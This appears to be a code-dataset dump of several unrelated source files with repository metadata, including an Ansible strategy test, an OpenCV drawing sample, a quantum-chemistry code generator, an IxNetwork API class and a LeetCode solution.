strategy = StrategyModule(tqm)
strategy._hosts_cache = [h.name for h in hosts]
strategy._hosts_cache_all = [h.name for h in hosts]
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# debug: task1, debug: task1
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'debug')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, 'task1')
self.assertEqual(host2_task.name, 'task1')
# mark the second host failed
itr.mark_host_failed(hosts[1])
# debug: task2, meta: noop
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'debug')
self.assertEqual(host2_task.action, 'meta')
self.assertEqual(host1_task.name, 'task2')
self.assertEqual(host2_task.name, '')
# meta: noop, debug: rescue1
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, '')
self.assertEqual(host2_task.name, 'rescue1')
# meta: noop, debug: rescue2
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'debug')
self.assertEqual(host1_task.name, '')
self.assertEqual(host2_task.name, 'rescue2')
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# implicit meta: flush_handlers
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNotNone(host1_task)
self.assertIsNotNone(host2_task)
self.assertEqual(host1_task.action, 'meta')
self.assertEqual(host2_task.action, 'meta')
# end of iteration
hosts_left = strategy.get_hosts_left(itr)
hosts_tasks = strategy._get_next_task_lockstep(hosts_left, itr)
host1_task = hosts_tasks[0][1]
host2_task = hosts_tasks[1][1]
self.assertIsNone(host1_task)
self.assertIsNone(host2_task)
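        # Recap (a descriptive note, not an extra assertion): once host01 is
        # marked failed, the linear strategy keeps both hosts in lockstep with
        # meta noop tasks: host01 noops while host00 runs task2, then host00
        # noops while host01 runs the rescue tasks, until both reach the
        # trailing flush_handlers and the end of iteration.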
|
[
"wk@sydorenko.org.ua"
] |
wk@sydorenko.org.ua
|
46f958cb763206d56bc7da152abd572fd4efbcdd
|
f848ebf1adb25cc6d188f43fb02c06dad1b01651
|
/script/test_inrm_login_params.py
|
5495769f03c5f39cd9e6a55464118c0e8a19183c
|
[] |
no_license
|
miao88318/day03_apiTestIHRM
|
673320c724d9a661fa9ed120a62e0d82118719d9
|
213e4a498055e693993b21ca2bc7942af2a25c74
|
refs/heads/master
| 2022-07-28T04:39:05.390142
| 2020-05-21T07:06:23
| 2020-05-21T07:06:23
| 265,769,499
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 978
|
py
|
# Imports
import unittest
import logging
import requests
from parameterized import parameterized
import app
from api.login_api import TestLoginApi
from utils import assert_common, read_login_data
# Create the test class, inheriting from unittest.TestCase
class TestIHRMLogin(unittest.TestCase):
def setUp(self):
self.login_api = TestLoginApi()
def tearDown(self):
...
filename = app.BASE_DIR + "/data/login_data.json"
@parameterized.expand(read_login_data(filename))
def test01_login_success(self,case_name,jsonData,http_code,success,code,message):
        # Send the login request
headers = {"Content-Type": "application/json"}
response = self.login_api.login(jsonData, headers)
result = response.json()
# print("结果:", result)
logging.info("结果: {}".format(result))
        # Use the shared assertion helper
assert_common(http_code, success, code, message, response, self)
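# A sketch of what read_login_data() is assumed to yield per case from
# data/login_data.json, matching the parameter list above (values are
# placeholders, not taken from the original data file):
# ["login_success", {"mobile": "...", "password": "..."}, 200, True, 10000, "success"]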
|
[
"stan@stan.com"
] |
stan@stan.com
|
f5066bcfc3cd5773cce13c4c7639419c5523cd4a
|
f83ef53177180ebfeb5a3e230aa29794f52ce1fc
|
/opencv/opencv-3.4.2/samples/python/tutorial_code/core/BasicGeometricDrawing/basic_geometric_drawing.py
|
ec25d64a455c231b53d1115a53f1480bab1b6d82
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
msrLi/portingSources
|
fe7528b3fd08eed4a1b41383c88ee5c09c2294ef
|
57d561730ab27804a3172b33807f2bffbc9e52ae
|
refs/heads/master
| 2021-07-08T01:22:29.604203
| 2019-07-10T13:07:06
| 2019-07-10T13:07:06
| 196,183,165
| 2
| 1
|
Apache-2.0
| 2020-10-13T14:30:53
| 2019-07-10T10:16:46
| null |
UTF-8
|
Python
| false
| false
| 3,092
|
py
|
import cv2 as cv
import numpy as np
W = 400
## [my_ellipse]
def my_ellipse(img, angle):
thickness = 2
line_type = 8
cv.ellipse(img,
               (W // 2, W // 2),
               (W // 4, W // 16),
angle,
0,
360,
(255, 0, 0),
thickness,
line_type)
## [my_ellipse]
## [my_filled_circle]
def my_filled_circle(img, center):
thickness = -1
line_type = 8
cv.circle(img,
center,
              W // 32,
(0, 0, 255),
thickness,
line_type)
## [my_filled_circle]
## [my_polygon]
def my_polygon(img):
line_type = 8
# Create some points
    ppt = np.array([[W // 4, 7 * W // 8], [3 * W // 4, 7 * W // 8],
                    [3 * W // 4, 13 * W // 16], [11 * W // 16, 13 * W // 16],
                    [19 * W // 32, 3 * W // 8], [3 * W // 4, 3 * W // 8],
                    [3 * W // 4, W // 8], [26 * W // 40, W // 8],
                    [26 * W // 40, W // 4], [22 * W // 40, W // 4],
                    [22 * W // 40, W // 8], [18 * W // 40, W // 8],
                    [18 * W // 40, W // 4], [14 * W // 40, W // 4],
                    [14 * W // 40, W // 8], [W // 4, W // 8],
                    [W // 4, 3 * W // 8], [13 * W // 32, 3 * W // 8],
                    [5 * W // 16, 13 * W // 16], [W // 4, 13 * W // 16]], np.int32)
ppt = ppt.reshape((-1, 1, 2))
cv.fillPoly(img, [ppt], (255, 255, 255), line_type)
    # Only drawing the lines would be:
# cv.polylines(img, [ppt], True, (255, 0, 255), line_type)
## [my_polygon]
## [my_line]
def my_line(img, start, end):
thickness = 2
line_type = 8
cv.line(img,
start,
end,
(0, 0, 0),
thickness,
line_type)
## [my_line]
## [create_images]
# Windows names
atom_window = "Drawing 1: Atom"
rook_window = "Drawing 2: Rook"
# Create black empty images
size = W, W, 3
atom_image = np.zeros(size, dtype=np.uint8)
rook_image = np.zeros(size, dtype=np.uint8)
## [create_images]
## [draw_atom]
# 1. Draw a simple atom:
# -----------------------
# 1.a. Creating ellipses
my_ellipse(atom_image, 90)
my_ellipse(atom_image, 0)
my_ellipse(atom_image, 45)
my_ellipse(atom_image, -45)
# 1.b. Creating circles
my_filled_circle(atom_image, (W // 2, W // 2))
## [draw_atom]
## [draw_rook]
# 2. Draw a rook
# ------------------
# 2.a. Create a convex polygon
my_polygon(rook_image)
## [rectangle]
# 2.b. Creating rectangles
cv.rectangle(rook_image,
             (0, 7 * W // 8),
(W, W),
(0, 255, 255),
-1,
8)
## [rectangle]
# 2.c. Create a few lines
my_line(rook_image, (0, 15 * W // 16), (W, 15 * W // 16))
my_line(rook_image, (W // 4, 7 * W // 8), (W // 4, W))
my_line(rook_image, (W // 2, 7 * W // 8), (W // 2, W))
my_line(rook_image, (3 * W // 4, 7 * W // 8), (3 * W // 4, W))
## [draw_rook]
cv.imshow(atom_window, atom_image)
cv.moveWindow(atom_window, 0, 200)
cv.imshow(rook_window, rook_image)
cv.moveWindow(rook_window, W, 200)
cv.waitKey(0)
cv.destroyAllWindows()
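# Note: the floor divisions (//) above matter under Python 3, where drawing
# functions such as cv.ellipse and cv.circle reject float coordinates.
# A headless alternative (a sketch; the file names are arbitrary) would save
# the drawings instead of displaying them:
# cv.imwrite('atom.png', atom_image)
# cv.imwrite('rook.png', rook_image)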
|
[
"lihuibin705@163.com"
] |
lihuibin705@163.com
|
8524d570eba1d25b43e2af97a5dbfbeccd5cddf8
|
fc73e7249e227e5507976bd3825af037fbe6b46b
|
/legacy/lcc_codes/lcc_ccvv.py
|
9e7115bdb17baa96e0163bf5d61d2702fd92c978
|
[
"LicenseRef-scancode-philippe-de-muyter"
] |
permissive
|
mussard/SecondQuantizationAlgebra
|
32d10d85abae82da343c9b41764802f3f541d551
|
ee32159e24d510654a6d38df391b544ec9ffeb4a
|
refs/heads/master
| 2020-03-17T21:46:28.875095
| 2019-07-10T17:31:26
| 2019-07-10T17:31:26
| 133,974,911
| 0
| 0
| null | 2018-05-18T15:50:13
| 2018-05-18T15:50:13
| null |
UTF-8
|
Python
| false
| false
| 7,597
|
py
|
import secondQuantizationAlgebra as sqa
import writeCode
import geraldCode
sqa.options.verbose = False
# definitions
tag_core = sqa.options.core_type
tag_active = sqa.options.active_type
tag_virtual = sqa.options.virtual_type
a = sqa.index('Va', [tag_virtual], True)
b = sqa.index('Vb', [tag_virtual], True)
c = sqa.index('Vc', [tag_virtual], True)
d = sqa.index('Vd', [tag_virtual], True)
i = sqa.index('Ci', [tag_core], True)
j = sqa.index('Cj', [tag_core], True)
k = sqa.index('Ck', [tag_core], True)
l = sqa.index('Cl', [tag_core], True)
p = sqa.index('Ap', [tag_active], True)
q = sqa.index('Aq', [tag_active], True)
r = sqa.index('Ar', [tag_active], True)
s = sqa.index('As', [tag_active], True)
x1 = sqa.index('Au', [tag_active], True)
x2 = sqa.index('Av', [tag_active], True)
x3 = sqa.index('Aw', [tag_active], True)
x4 = sqa.index('Ax', [tag_active], True)
i1 = sqa.index('Cm', [tag_core], True)
i2 = sqa.index('Cn', [tag_core], True)
i3 = sqa.index('Co', [tag_core], True)
i4 = sqa.index('Co1', [tag_core], True)
a1 = sqa.index('Vg', [tag_virtual], True)
a2 = sqa.index('Vh', [tag_virtual], True)
a3 = sqa.index('Ve', [tag_virtual], True)
a4 = sqa.index('Vf', [tag_virtual], True)
#h0 one body term
hsym = sqa.symmetry((1,0), 1)
Dsym_a = sqa.symmetry((2,1, 0,3), 1)
Dsym_b = sqa.symmetry((0,3, 2,1), 1)
Dsym_c = sqa.symmetry((1,0, 3,2), 1)
K_C = sqa.tensor('int1c', [i1,i2], [hsym])
K_A = sqa.tensor('int1a', [x1,x2], [hsym])
K_V = sqa.tensor('int1v', [a1,a2], [hsym])
V_CA1 = sqa.tensor('int2ca1', [i1,x1, i2,x2], [Dsym_a, Dsym_b])
V_CA2 = sqa.tensor('int2ca2', [i1,x1, x2,i2], [])
V_CV1 = sqa.tensor('int2cv1', [i1,a1, i2,a2], [Dsym_a, Dsym_b])
V_CV2 = sqa.tensor('int2cv2', [i1,a1, a2,i2], [])
V_AV1 = sqa.tensor('int2av1', [x1,a1, x2,a2], [Dsym_a, Dsym_b])
V_AV2 = sqa.tensor('int2av2', [x1,a1, a2,x2], [])
V_C = sqa.tensor('int2c', [i1,i2, i3,i4], [Dsym_a, Dsym_b, Dsym_c])
V_A = sqa.tensor('int2a', [x1,x2, x3,x4], [Dsym_a, Dsym_b, Dsym_c])
V_V = sqa.tensor('int2v', [a1,a2, a3,a4], [Dsym_a, Dsym_b, Dsym_c])
deltaC = sqa.tensor('deltac', [i1,i2], [hsym])
deltaA = sqa.tensor('deltaa', [x1,x2], [hsym])
deltaV = sqa.tensor('deltav', [a1,a2], [hsym])
ampstring = "eecc" #amplitude string
AllTensors = ["t", "R", "int1c", "int1a", "int1v", "int2ca1", "int2ca2",\
"int2cv1", "int2cv2", "int2av1", "int2av2", "int2c", "int2a", "int2v",\
"E1", "E2", "E3", "S1", "S2", "T", "b", "p", "Ap",\
"P", "AP", "B", "V", "deltac", "deltaa", "deltav", "t1"]
CommentTensors = ["t", "R", "k", "k", "k", "W", "W",\
"W", "W", "W", "W", "W", "W", "W",\
"E1", "E2", "E3", "S1", "S2", "T", "b", "p", "Ap",\
"P", "AP", "B", "W", "delta", "delta", "delta", "t1"]
Domains = [ampstring, ampstring, "cc", "aa", "ee", "caca", "caac",\
"cece", "ceec", "aeae", "aeea", "cccc", "aaaa", "eeee",\
"aa", "aaaa", "aaaaaa", "aa", "aa", ampstring, ampstring, ampstring, ampstring,\
ampstring, ampstring, ampstring, ampstring, "cc", "aa", "ee", ampstring]
Usage = ["A", "R", "H", "H", "H", "H", "H",\
"H", "H", "H", "H", "H", "H", "H",\
"D", "D", "D", "D", "D", "A", "A", "A", "A",\
"A", "A", "A", "H", "D", "D", "D", "A"]
pDomains = "\tint f(int i) {\n"
pDomains += "\t\treturn 2*i;\n"
pDomains += "\t}\n"
pDomains += "\tFDomainDecl DomainDecls[1] = {\n"
pDomains += "\t\t{\"A\", \"a\", f}\n"
pDomains += "\t};"
CommentKey = {}
print "namespace MRLCC_CCVV {\n"
for tc in list(zip(AllTensors, CommentTensors)):
CommentKey[tc[0]] = tc[1]
geraldCode.writeTensors(AllTensors, CommentKey, Domains, Usage)
HD_C = sqa.term( 0.5, [""], [V_C, sqa.sfExOp([i1,i2,i3,i4])] )
HD_A = sqa.term( 0.5, [""], [V_A, sqa.sfExOp([x1,x2,x3,x4])] )
HD_V = sqa.term( 0.5, [""], [V_V, sqa.sfExOp([a1,a2,a3,a4])] )
HD_CA1 = sqa.term( 1.0, [""], [V_CA1, sqa.sfExOp([i1,x1,i2,x2])] )
HD_CA2 = sqa.term( 1.0, [""], [V_CA2, sqa.sfExOp([i1,x1,x2,i2])] )
HD_CV1 = sqa.term( 1.0, [""], [V_CV1, sqa.sfExOp([i1,a1,i2,a2])] )
HD_CV2 = sqa.term( 1.0, [""], [V_CV2, sqa.sfExOp([i1,a1,a2,i2])] )
HD_AV1 = sqa.term( 1.0, [""], [V_AV1, sqa.sfExOp([x1,a1,x2,a2])] )
HD_AV2 = sqa.term( 1.0, [""], [V_AV2, sqa.sfExOp([x1,a1,a2,x2])] )
T_C = sqa.term( 1.0, [""], [K_C, sqa.sfExOp([i1,i2])] )
T_A = sqa.term( 1.0, [""], [K_A, sqa.sfExOp([x1,x2])] )
T_V = sqa.term( 1.0, [""], [K_V, sqa.sfExOp([a1,a2])] )
Cin = sqa.tensor("p", [a,b,i,j], [Dsym_c])
Cout = sqa.tensor("Ap", [c,d,k,l], [Dsym_c])
#first excitation
E_aiEbj = sqa.term( 1.0, [""], [Cin, sqa.sfExOp([a, i]) , sqa.sfExOp([b,j])])
E_aiEbj2 = sqa.term( 1.0, [""], [Cout, sqa.sfExOp([l, d]) , sqa.sfExOp([k,c])])
commutator = []
commutator += sqa.commutator(HD_C, E_aiEbj)
commutator += sqa.commutator(HD_A, E_aiEbj)
commutator += sqa.commutator(HD_V, E_aiEbj)
commutator += sqa.commutator(HD_CA1, E_aiEbj)
commutator += sqa.commutator(HD_CA2, E_aiEbj)
commutator += sqa.commutator(HD_CV1, E_aiEbj)
commutator += sqa.commutator(HD_CV2, E_aiEbj)
commutator += sqa.commutator(HD_AV1, E_aiEbj)
commutator += sqa.commutator(HD_AV2, E_aiEbj)
commutator += sqa.commutator(T_C, E_aiEbj)
commutator += sqa.commutator(T_A, E_aiEbj)
commutator += sqa.commutator(T_V, E_aiEbj)
result = []
for t in commutator:
result += sqa.normalOrder(sqa.multiplyTerms(E_aiEbj2, t))
for t in result:
t.contractDeltaFuncs_new()
sqa.removeVirtOps_sf(result)
sqa.termChop(result)
sqa.combineTerms(result)
extendedR=[]
for t in result:
extendedR += sqa.contractCoreOps_sf(t)
for t in extendedR:
t.contractDeltaFuncs_new()
sqa.termChop(extendedR)
sqa.combineTerms(extendedR)
#for t in extendedR:
# print t
#print
result = []
rdmDelta = [deltaC, deltaA, deltaV]
#********this adds delta functions when we have repeat indices****************#
for r in extendedR:
result.append(geraldCode.replaceRepeatIndicesWithDeltas(r, rdmDelta))
print "//Number of terms : ", len(result)
print "\tFEqInfo EqsRes[%i] = {\n"%(len(result))
geraldCode.WriteCode_lccSimple(result, AllTensors, CommentKey)
print "\n\t};"
bindex = AllTensors.index("b")
Vindex = AllTensors.index("V")
E1index = AllTensors.index("deltac")
print(pDomains)
print("\tFEqInfo Overlap[4] = {")
print("\t\t{\"CDKL,LM,CDKM\", 2.0, 3, {%i, %i, %i}}," % (bindex, E1index, Vindex))
print("\t\t{\"CDKL,LM,DCKM\",-1.0, 3, {%i, %i, %i}}," % (bindex, E1index, Vindex))
print("\t\t{\"CDKL,LM,CDMK\",-1.0, 3, {%i, %i, %i}}," % (bindex, E1index, Vindex))
print("\t\t{\"CDKL,LM,DCMK\", 2.0, 3, {%i, %i, %i}}," % (bindex, E1index, Vindex))
print("\t};")
print("\tstatic void GetMethodInfo(FMethodInfo &Out) {")
print("\t\tOut = FMethodInfo();")
print("\t\tOut.pName = \"MRLCC_CCVV\";")
print("\t\tOut.perturberClass = \"CCVV\";")
print("\t\tOut.pSpinClass = \"restricted\";")
print("\t\tOut.pTensorDecls = &TensorDecls[0];")
print("\t\tOut.nTensorDecls = %i;" % (len(Usage)))
print("\t\tOut.pDomainDecls = &DomainDecls[0];")
print("\t\tOut.nDomainDecls = 0;")
print("\t\tOut.EqsRes = FEqSet(&EqsRes[0], %i, \"MRLCC_CCVV/Res\");" % (len(result)))
print("\t\tOut.Overlap = FEqSet(&Overlap[0], 4, \"MRLCC_CCVV/Overlap\");")
print("\t};")
print("};")
'''
intmapkey = {"Va" : "nc:", "Vb" : "nc:", "Vc" : "nc:", "Vd" : "nc:", "a" : ":ncore", "b" : ":ncore", "c" : ":ncore", "d" : ":ncore"}
RDMmapkey = {"a" : ":", "b" : ":", "c" : ":", "d" : ":"}
writeCode.WriteCode(extendedR, True, intmapkey, RDMmapkey)
exit(0)
'''
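# Usage note (an assumption about the intended workflow, not stated in the
# source): the script emits a C++ namespace on stdout, so the output is
# presumably redirected into the consuming code base, e.g.
#   python lcc_ccvv.py > MRLCC_CCVV.cpp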
|
[
"bastien.mussard@colorado.edu"
] |
bastien.mussard@colorado.edu
|
27e81b006347dc87e451cca4626b5d9a652d671e
|
1eab574606dffb14a63195de994ee7c2355989b1
|
/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/labelspace_buum91dgvsyw5nzs9sywjlbfnwywnl.py
|
07c893743c85322fac1af7af913f0cc8e9d27226
|
[
"MIT"
] |
permissive
|
steiler/ixnetwork_restpy
|
56b3f08726301e9938aaea26f6dcd20ebf53c806
|
dd7ec0d311b74cefb1fe310d57b5c8a65d6d4ff9
|
refs/heads/master
| 2020-09-04T12:10:18.387184
| 2019-11-05T11:29:43
| 2019-11-05T11:29:43
| 219,728,796
| 0
| 0
| null | 2019-11-05T11:28:29
| 2019-11-05T11:28:26
| null |
UTF-8
|
Python
| false
| false
| 3,341
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class LabelSpace(Base):
"""This object configures the labels for the route range.
The LabelSpace class encapsulates a required labelSpace resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'labelSpace'
def __init__(self, parent):
super(LabelSpace, self).__init__(parent)
@property
def End(self):
"""The last label value available in the label space (range).
Returns:
number
"""
return self._get_attribute('end')
@End.setter
def End(self, value):
self._set_attribute('end', value)
@property
def LabelId(self):
"""The identifier for the label space.
Returns:
number
"""
return self._get_attribute('labelId')
@LabelId.setter
def LabelId(self, value):
self._set_attribute('labelId', value)
@property
def Mode(self):
"""Sets the Label mode.
Returns:
str(fixedLabel|incrementLabel)
"""
return self._get_attribute('mode')
@Mode.setter
def Mode(self, value):
self._set_attribute('mode', value)
@property
def Start(self):
"""The first label value available in the label space (range). The default is 16.
Returns:
number
"""
return self._get_attribute('start')
@Start.setter
def Start(self, value):
self._set_attribute('start', value)
@property
def Step(self):
"""The value to add for creating each additional label value.
Returns:
number
"""
return self._get_attribute('step')
@Step.setter
def Step(self, value):
self._set_attribute('step', value)
def update(self, End=None, LabelId=None, Mode=None, Start=None, Step=None):
"""Updates a child instance of labelSpace on the server.
Args:
End (number): The last label value available in the label space (range).
LabelId (number): The identifier for the label space.
Mode (str(fixedLabel|incrementLabel)): Sets the Label mode.
Start (number): The first label value available in the label space (range). The default is 16.
Step (number): The value to add for creating each additional label value.
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
self._update(locals())
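# A hypothetical usage sketch (the `ldp_router` parent below is an assumption;
# in the generated API a LabelSpace is reached through its parent protocol
# object and configured via update()):
# label_space = ldp_router.LabelSpace
# label_space.update(Mode='incrementLabel', Start=16, Step=1, End=1023)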
|
[
"srvc_cm_packages@keysight.com"
] |
srvc_cm_packages@keysight.com
|
0e2bc5af47220d0e776cd4bfd2f23a7afeb398d4
|
789a540bbb79c334cbeaf3687876bfd939e4290b
|
/app/handlers/private/default/message/menu/sellers/show_category_sellers.py
|
db4caa4d7348436fd646cd2e4ad4ab67492dde55
|
[] |
no_license
|
ExissBrr/TRIGON-GARANT-BOT
|
2cc96f5f6f195f4e76c164db4f8acafbfa5b7662
|
812acf060eb92e6fad21568a75e6dba7ce0da4d9
|
refs/heads/main
| 2023-07-04T18:22:43.507453
| 2021-08-17T14:51:30
| 2021-08-17T14:51:30
| 392,725,437
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,427
|
py
|
from aiogram.dispatcher.filters import Command
from aiogram.types import Message
from app import keyboards
from app.data import text
from app.data.types.category_data import ServiceCategoryType
from app.data.types.links import category_link
from app.data.types.seller_data import SellerStatus
from app.loader import dp
from app.utils.db_api.models.sellers import Seller
@dp.message_handler(Command('seller_category'))
async def show_sellers_in_category(message: Message, lang_code):
category_from_args = message.text.split(':')[-1]
await message.delete()
if category_from_args not in ServiceCategoryType.__dict__.values():
await message.answer(
text=text[lang_code].default.message.choose_category_among_list
)
return False
for key, value in ServiceCategoryType.__dict__.items():
if value == category_from_args:
photo_url = category_link[key]
sellers = await Seller.query.where(Seller.status == SellerStatus.ACTIVE).where(
Seller.category == category_from_args).gino.all()
await message.answer_photo(
photo=photo_url,
caption=text[lang_code].default.message.seller_list_in_category.format(category=category_from_args),
reply_markup=await keyboards.default.inline.sellers.show_seller_list_in_category.make_keyboard_sellers_list(
sellers=sellers,
category_name=category_from_args)
)
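# Expected trigger format (inferred from the split(':') above, not from any
# documentation): the handler reacts to messages such as
# "/seller_category:<category_value>", where <category_value> must be one of
# the ServiceCategoryType values.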
|
[
"vladbelykh2002@gmail.com"
] |
vladbelykh2002@gmail.com
|
076e2398568768a8a288eeb4e5dd7d351fd1ea99
|
0e1e643e864bcb96cf06f14f4cb559b034e114d0
|
/Exps_7_v3/doc3d/Ablation4_ch016_ep003/Gather3_W_fix3blk_C_change/train/pyr_0s/L4/step09_0side_L4.py
|
f05661764ce1d26fa473aac73bbf00769cf8c4ad
|
[] |
no_license
|
KongBOy/kong_model2
|
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
|
1af20b168ffccf0d5293a393a40a9fa9519410b2
|
refs/heads/master
| 2022-10-14T03:09:22.543998
| 2022-10-06T11:33:42
| 2022-10-06T11:33:42
| 242,080,692
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,007
|
py
|
#############################################################################################################################################################################################################
from step08_c_use_G_generate_I_w_M_to_Wx_Wy_Wz_focus_to_Cx_Cy_focus_combine import I_w_M_to_W_to_C
from step08_b_use_G_generate_0_util import Tight_crop, Color_jit
from step09_c_train_step import Train_step_I_w_M_to_W_to_C
from step09_d_KModel_builder_combine_step789 import KModel_builder, MODEL_NAME
color_jit = Color_jit(do_ratio=0.6)
use_gen_op_p20 = I_w_M_to_W_to_C( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 0) )  ### My current multi_model I_to_Wxyz_to_Cxy_general always returns Wz_pre_w_M, Wy_pre_w_M, Wx_pre_w_M, Cx_pre_w_M and Cy_pre_w_M, so regardless of wi/woDIV it is correct to set every Separate flag to True
use_train_step_p20 = Train_step_I_w_M_to_W_to_C( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 15), color_jit=color_jit )  ### Same reasoning as above: all outputs are returned, so every Separate flag is simply set to True
from Exps_7_v3.doc3d.Ablation4_ch016_ep003.W_w_M_to_C_pyr.pyr_0s.L4.step09_0side_L4 import *
from Exps_7_v3.doc3d.Ablation4_ch016_ep003.I_w_M_to_W_pyr.pyr_3s.L5.step09_3side_L5 import ch032_pyramid_1side_6__2side_6__3side_6 as I_w_M_to_W_Tcrop255_p20_3s_L5_good
import time
start_time = time.time()
###############################################################################################################################################################################################
#########################################################################################
ch032_pyramid_0side_and_1s6_2s6 = KModel_builder().set_model_name(MODEL_NAME.multi_flow_unet).set_multi_model_builders(op_type="I_to_Wxyz_to_Cxy_general", W_to_Cx_Cy=ch032_pyramid_0side, I_to_Wx_Wy_Wz=I_w_M_to_W_Tcrop255_p20_3s_L5_good).set_multi_model_separate_focus(I_to_W_separ=False, I_to_W_focus=True, W_to_C_separ=False, W_to_C_focus=True).set_gen_op( use_gen_op_p20 ).set_train_step( use_train_step_p20 )
#########################################################################################
###############################################################################################################################################################################################
if(__name__ == "__main__"):
import numpy as np
print("build_model cost time:", time.time() - start_time)
data = np.zeros(shape=(1, 512, 512, 1))
use_model = ch032_pyramid_0side
use_model = use_model.build()
result = use_model.generator(data, Mask=data)
print(result[0].shape)
from kong_util.tf_model_util import Show_model_weights
Show_model_weights(use_model.generator)
use_model.generator.summary()
|
[
"s89334roy@yahoo.com.tw"
] |
s89334roy@yahoo.com.tw
|
cf9a6b4197df455636515613c5824e6d9f7308fb
|
58afefdde86346760bea40690b1675c6639c8b84
|
/leetcode/next-greater-element-iii/282256643.py
|
f2f7254ab8ded0ed13d4530720a51054bf710131
|
[] |
no_license
|
ausaki/data_structures_and_algorithms
|
aaa563f713cbab3c34a9465039d52b853f95548e
|
4f5f5124534bd4423356a5f5572b8a39b7828d80
|
refs/heads/master
| 2021-06-21T10:44:44.549601
| 2021-04-06T11:30:21
| 2021-04-06T11:30:21
| 201,942,771
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
# title: next-greater-element-iii
# detail: https://leetcode.com/submissions/detail/282256643/
# datetime: Thu Nov 28 18:18:27 2019
# runtime: 28 ms
# memory: 12.7 MB
import bisect
class Solution:
def nextGreaterElement(self, n: int) -> int:
if n < 10:
return -1
digits = []
while n:
n, d = divmod(n, 10)
if not digits or d >= digits[-1]:
digits.append(d)
else:
i = bisect.bisect(digits, d)
digits[i], d = d, digits[i]
n = n * 10 + d
for d in digits:
n = n * 10 + d
return n if n <= (2 ** 31 - 1) else -1
return -1
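# Worked examples (hand-checked against the algorithm above):
# Solution().nextGreaterElement(12)         -> 21  (swap the last two digits)
# Solution().nextGreaterElement(21)         -> -1  (digits already descending)
# Solution().nextGreaterElement(2147483647) -> -1  (2147483674 overflows 2**31 - 1)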
|
[
"ljm51689@gmail.com"
] |
ljm51689@gmail.com
|
3a408a86fe1300ed34d82149434b6881b3685bb5
|
80ea03860dedce77e53594472385657bfcd5b6cd
|
/test/test_cons.py
|
963ab07dd3c8c669dd3fa0ffbe02335e985d7c7f
|
[] |
no_license
|
RelationalAI-oss/relationalai-sdk-python
|
434f0531226367d7eccc66ab6c77caafafaa3ce5
|
fdea5fdec84231ae0bb3f2bfd32ed84e962052ae
|
refs/heads/master
| 2023-06-10T01:48:05.624101
| 2021-06-29T15:07:44
| 2021-06-29T15:07:44
| 379,428,666
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 922
|
py
|
"""
Delve Client SDK
This is a Client SDK for Delve API # noqa: E501
